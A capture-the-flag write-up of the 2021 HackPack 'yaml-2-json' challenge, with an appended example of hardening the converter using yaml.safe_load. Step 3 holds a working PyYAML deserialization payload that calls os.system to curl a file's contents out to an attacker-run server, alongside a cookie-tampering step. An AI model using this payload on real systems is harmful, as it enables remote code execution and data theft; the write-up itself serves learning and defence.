Tags: pyyaml web 


# page view

![image](https://user-images.githubusercontent.com/44183111/115112242-95756200-9fbf-11eb-8cae-163d382c7f4e.png)

- The target page converts YAML to JSON.

---

# step1) modify cookie
- Change the [premium cookie] value from false to true.
![](https://media.discordapp.net/attachments/832278373064638504/832668607439044660/unknown.png)

---

# step2) simple http server
- I used Python's simple HTTP server to capture the flag.
``` bash
python3 -m http.server 3000
```

---

# step3) exploitation
- The exploitation code is below.
``` yaml
"parkmin": !!python/object/apply:os.system ["curl http://myserver.com:3000/?`cat /tmp/flag.txt`"]
```

- The flag arrives in the request log of the simple HTTP server.
``` bash
152.14.92.89 - - [16/Apr/2021 18:06:26] "GET /? HTTP/1.1" 200 -
152.14.92.89 - - [16/Apr/2021 18:06:33] "GET /? HTTP/1.1" 200 -
152.14.92.89 - - [16/Apr/2021 18:06:47] "GET /?flagPy_PyYaml_Yaml_Py HTTP/1.1" 200 -
152.14.92.89 - - [16/Apr/2021 18:07:07] "GET /?flagPy_PyYaml_Yaml_Py HTTP/1.1" 200 -
```
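
Why the tag in step 3 gets executed, and how the converter would be hardened, as an added example that is not from the original writeup or the challenge source. It assumes the server parsed input with PyYAML's unsafe `yaml.Loader`; the function names and sample documents are constructed, and the tag here calls the harmless `len()` instead of `os.system`.

``` python
import json

import yaml  # PyYAML

# Constructed inputs. PAYLOAD_SHAPE uses the same python/object/apply tag as
# the step 3 document, but names the harmless builtin len().
BENIGN = "name: parkmin\nroles: [user, premium]\n"
PAYLOAD_SHAPE = '"parkmin": !!python/object/apply:builtins.len ["abc"]\n'


def convert_unsafe(text):
    """Assumed shape of the vulnerable converter.

    yaml.Loader builds arbitrary Python objects, so a python/object/apply
    tag imports the named module and calls the named function with the
    arguments given in the document.
    """
    return json.dumps(yaml.load(text, Loader=yaml.Loader))


def convert_safe(text):
    """Hardened converter.

    safe_load only constructs plain scalars, lists and dicts. Any python/*
    tag raises ConstructorError (a YAMLError) before anything is called.
    """
    try:
        data = yaml.safe_load(text)
    except yaml.YAMLError as exc:
        raise ValueError("rejected YAML input: " + type(exc).__name__) from None
    return json.dumps(data)


def is_rejected(text):
    """True when the hardened converter refuses the document."""
    try:
        convert_safe(text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(convert_safe(BENIGN))           # ordinary documents still convert
    print(convert_unsafe(PAYLOAD_SHAPE))  # the tag ran: value is len("abc")
    print(is_rejected(PAYLOAD_SHAPE))     # safe_load refuses the same input
```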

Original writeup (https://r99bbit.github.io/ctf/2021-HackPack-CTF-yaml-2-json/).